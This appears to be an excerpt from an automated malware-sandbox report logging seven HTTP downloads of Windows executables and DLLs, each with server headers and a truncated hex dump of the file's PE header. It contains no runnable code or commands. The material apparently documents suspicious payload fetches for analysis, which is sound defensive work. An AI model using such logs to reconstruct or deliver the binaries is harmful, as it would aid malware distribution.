Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 13:44:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 31 Aug 2024 13:44:24 GMTContent-Type: application/octet-streamContent-Length: 10481152Last-Modified: Sun, 25 Aug 2024 13:30:36 GMTConnection: keep-aliveETag: "66cb31fc-9fee00"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 83 2e cb 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 c4 5d 00 00 26 42 00 00 00 00 00 60 d3 5d 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 30 a1 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 60 67 00 9c 00 00 00 00 70 66 00 a6 50 00 00 00 30 71 00 00 f2 2f 00 00 40 6c 00 30 ec 04 00 00 00 00 00 00 00 00 00 00 90 67 00 f8 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 67 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 84 66 00 f8 12 00 00 00 d0 66 00 46 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 c3 5d 00 00 10 00 00 00 c4 5d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 18 b1 07 00 00 e0 5d 00 00 b2 07 00 00 c8 5d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 2c c5 00 00 00 a0 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 a6 50 00 00 00 70 66 00 00 52 00 00 00 7a 65 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 46 8e 00 00 00 d0 66 00 00 90 00 00 00 cc 65 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 9c 00 00 00 00 60 67 00 00 02 00 00 00 5c 66 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 e4 01 00 00 00 70 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 6d 00 00 00 00 80 67 00 00 02 00 00 00 5e 66 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 ac 04 00 00 90 67 00 00 ae 04 00 00 60 66 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 70 64 61 74 61 00 00 30 ec 04 00 00 40 6c 00 00 ee 04 00 00 0e 6b 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 13:44:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 13:44:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 13:44:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 13:44:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 13:44:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
